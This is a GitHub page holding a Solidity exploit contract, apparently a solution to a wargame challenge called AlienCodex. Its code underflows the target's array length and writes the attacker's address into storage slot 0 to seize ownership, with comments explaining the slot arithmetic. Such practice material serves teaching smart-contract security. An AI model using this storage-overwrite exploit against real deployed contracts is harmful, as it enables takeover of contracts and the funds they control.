-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathAlienCodexAttack.sol
More file actions
36 lines (27 loc) · 1.04 KB
/
AlienCodexAttack.sol
File metadata and controls
36 lines (27 loc) · 1.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
pragma solidity ^0.5.0;
import "hardhat/console.sol";
interface IAlienCodex {
function make_contact() external;
function retract() external;
function revise(uint256 i, bytes32 _content) external;
function record(bytes32 _content) external;
}
contract AlienCodexAttack {
function attack(address _target) public {
IAlienCodex target = IAlienCodex(_target); //
target.make_contact();
// Underflow the array length making it the max value of uint256.
// This allows to write an element into ANY slot.
target.retract();
// Calculate element index such that keccak256(codex.slot) + element index = 0
// 0 is the slot number of the owner variable
// Element slot = keccak256(array.slot) + element index
// Element address = keccak256(keccak256(array.slot) + element index)
target.revise(
(2**256 - 1) -
uint256(keccak256(abi.encodePacked(uint256(0x01)))) +
1,
bytes32(uint256(msg.sender))
);
}
}